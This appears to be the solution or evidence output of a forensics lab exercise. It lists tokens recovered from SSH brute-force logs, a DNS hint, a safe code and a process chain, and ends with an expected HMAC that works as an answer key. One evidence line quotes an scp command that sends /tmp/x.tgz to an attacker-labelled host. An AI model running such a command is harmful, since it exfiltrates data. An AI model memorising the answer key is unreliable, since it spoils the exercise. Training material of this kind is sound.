TOKEN[KEYPAD]=4246
EVIDENCE[KEYPAD].TOP24=203.0.113.0/24
EVIDENCE[KEYPAD].COUNT=46
EVIDENCE[KEYPAD].SAMPLE=2025-08-09T12:00:54Z lab1 sshd[3082]: Failed password for admin from 203.0.113.132 port 56920 protocol 2
EVIDENCE[KEYPAD].MALFORMED_SKIPPED=2
TOKEN[DNS]=phrase
EVIDENCE[DNS].KEY=hint5
EVIDENCE[DNS].DECODED_LINE=Look inside the DNS anchor for the right phrase.
TOKEN[SAFE]=13-7-20
EVIDENCE[SAFE].MATCH=SAFE{ 13 - 7 - 20 }
EVIDENCE[SAFE].CHECK=13+7=20
TOKEN[PID]=220
EVIDENCE[PID].PATH=[212->215->216->220]
EVIDENCE[PID].CMD="scp /tmp/x.tgz attacker@198.51.100.33:/upload"
FINAL_GATE=PENDING
MSG=msc-group-08|4246-phrase-13-7-20-220
EXPECTED_HMAC=1681c3ce11f4ba001bc2d94ae280187179c832323f36aa4b5fefe3b6149dabef